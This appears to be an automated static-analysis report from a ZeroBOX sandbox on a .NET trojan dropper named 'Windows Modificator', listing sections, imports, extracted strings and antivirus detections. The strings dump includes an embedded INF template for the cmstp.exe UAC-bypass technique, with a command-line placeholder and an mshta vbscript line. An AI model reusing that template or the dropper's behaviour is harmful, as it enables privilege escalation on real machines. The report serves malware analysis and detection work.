Static | ZeroBOX

PE Compile Time

2024-07-17 03:35:42

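PE Imphash (computed from the import table, which here is only mscoree.dll!_CorExeMain; that single import is common to .NET executables, so this value is a weak pivot for clustering)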

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00006e24 0x00007000 7.19779574748
.rsrc 0x0000a000 0x0000805c 0x00008200 4.36429802945
.reloc 0x00014000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x00011b68 0x00000092 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x00011bfc 0x00000274 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x00011e70 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
]]U]]]]]
Ze]"$=V
>`v3aH
Q6ig%C
uaj_@Vx*
[agG9Z%
aN<pEs
2}Jsi,
|PT\0;
8oNgVLy2l
kAy9%G
6y7387B
G,/y/?
A^"@w_
XX(=bg
8]b{8:
]R{7}T
>3k>l>n
6t9]MCt
;A"v7}
L~$5Fk
f|FFjl
(>5x 3
<-xkE&
1u$32>R
k=&s/x0
MHGx$+6
+_~g|8
"'&'[9
V\rdd8
v4.0.30319
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
Program
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
CreateMutex
Decompress
GetTheResource
PostMessageW
wParam
lParam
FindWindowEx
parentHandle
childAfter
lclassName
windowTitle
user32
BinaryPath
SetInfFile
CommandToExecute
Execute
AdminCheck
System.Collections.Generic
List`1
System.Threading
_appMutex
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
Interaction
Environ
String
Concat
IEnumerable`1
Microsoft.Win32
RegistryKey
Exception
Thread
Environment
get_ExitCode
ServerComputer
Microsoft.VisualBasic.MyServices
RegistryProxy
get_Registry
get_CurrentUser
OpenSubKey
GetValue
Operators
ConditionalCompareObjectEqual
SetValue
ProjectData
SetProjectError
ClearProjectError
Enumerator
GetEnumerator
get_Current
Conversions
Strings
CompareMethod
ConcatenateObject
System.IO
Directory
Exists
DirectoryInfo
CreateDirectory
Convert
ToBoolean
WriteAllBytes
FileAttributes
SetAttributes
Process
Collect
MoveNext
IDisposable
Dispose
Replace
System.Windows.Forms
MessageBox
DialogResult
MessageBoxButtons
MessageBoxIcon
MemoryStream
Boolean
NewLateBinding
LateCall
ChangeType
BitConverter
ToInt32
Stream
System.IO.Compression
GZipStream
CompressionMode
SubtractObject
ToInteger
System.Reflection
Assembly
System.Resources
ResourceManager
GetExecutingAssembly
GetObject
Contains
AppDomain
get_CurrentDomain
get_BaseDirectory
ExpandEnvironmentVariables
System.Text
StringBuilder
GetRandomFileName
ToChar
Append
WriteAllText
ProcessStartInfo
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
set_Arguments
ProcessWindowStyle
set_WindowStyle
IntPtr
op_Explicit
System.Security.Principal
WindowsIdentity
GetCurrent
WindowsPrincipal
WindowsBuiltInRole
IsInRole
StreamWriter
GetTempFileName
TextWriter
WriteLine
get_StartupPath
get_ExecutablePath
GetFileName
GetTempPath
set_FileName
set_CreateNoWindow
set_ErrorDialog
set_UseShellExecute
STAThreadAttribute
DllImportAttribute
user32.dll
MarshalAsAttribute
UnmanagedType
ikiosfbywomf.Resources
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
GuidAttribute
AssemblyFileVersionAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
Windows Modificator
Windows Modificator.exe
MyTemplate
14.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
WrapNonExceptionThrows
$753cbffa-01fb-4183-82de-f50f29a4bf0e
1.0.0.0
_CorExeMain
mscoree.dll
wwwwwwwwwwwwwwwwwwwww
Se%ae`
cCBR_p
RRRRP%
CCCC@40`P@
cG?CCRRRRP`R
4qaCCRCCCB
pqacG%%apppppppaB
prRRRPa
wwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwww
se%%%%% R
u%6RRRRRPp
wwwwwwwwwwwwwww
wwwwwwwwp
wwwwwwww
!

((((&&(&&&(&(&&&&&&(((#&&###
*)))))))))))))))))))))
eIDATx
""""""""""""""""""""""""""""""""""""""""
'Px0&D
XXX8Pvh8v
],//cuu
n<DSbb
!KD4)#
NDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
WindowsModificator.exe
fakecmd.bat
WinDir
\system32\cmstp.exe
WindowsModificator.exe|True|False|False|%Temp%|False|False|False
fakecmd.bat|True|False|False|%Temp%|False|False|False
PZ9MfxjDP8QL1vpTW
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
ShowSuperHidden
windows_health_service.warning
\vbNewLine
Windows
ikiosfbywomf
%Current%
REPLACE_COMMAND_LINE
"CorpVPN"
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
###REPLACE_COMMAND_LINE###
mshta vbscript:Execute(###CreateObject(####WScript.Shell####).Run ####taskkill /IM cmstp.exe /F####, 0, true:close###)
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
##HKLM##, ##SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE##, ##ProfileInstallPath##, ##%UnexpectedError%##, ####
[Strings]
ServiceName=##CorpVPN##
ShortSvcName=##CorpVPN##
@echo off
timeout 3 > NUL
" /f /q
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
Windows Modificator.exe
LegalCopyright
OriginalFilename
Windows Modificator.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature (engine name followed by its detection name; "Clean" means that engine reported no detection)
Bkav W32.AIDetectMalware.CS
Lionic Clean
tehtris Clean
ClamAV Win.Packed.Msilmamut-10007182-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac IL:Trojan.MSILZilla.19217
Cylance Unsafe
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
Alibaba Clean
K7GW Clean
Cybereason malicious.8d5d47
Baidu Clean
VirIT Clean
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDropper.Agent.FOV
APEX Malicious
Avast Win32:InjectorX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender IL:Trojan.MSILZilla.19217
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan IL:Trojan.MSILZilla.19217
Tencent Win32.Trojan.Generic.Zmhl
Sophos Troj/Mdrop-JVT
F-Secure Trojan.TR/ATRAPS.Gen
DrWeb Trojan.MulDropNET.65
VIPRE IL:Trojan.MSILZilla.19217
TrendMicro Clean
McAfeeD Real Protect-LS!E2E17EA8D5D4
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.e2e17ea8d5d471e5
Emsisoft IL:Trojan.MSILZilla.19217 (B)
Paloalto Clean
GData IL:Trojan.MSILZilla.19217
Jiangmin Clean
Webroot Clean
Varist W32/MSIL_Agent.BUD.gen!Eldorado
Avira TR/ATRAPS.Gen
MAX malware (ai score=84)
Antiy-AVL Clean
Kingsoft malware.kb.c.1000
Gridinsoft Clean
Xcitium Clean
Arcabit IL:Trojan.MSILZilla.D4B11
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft Trojan:MSIL/XWormRAT.A!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5052738
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Malwarebytes Trojan.Dropper.MSIL.Generic
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
Ikarus Trojan.MSIL.Injector
MaxSecure Clean
Fortinet MSIL/Agent.FOV!tr
BitDefenderTheta Gen:NN.ZemsilF.36808.dm0@am1OZDi
AVG Win32:InjectorX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Clean
No IRMA results available.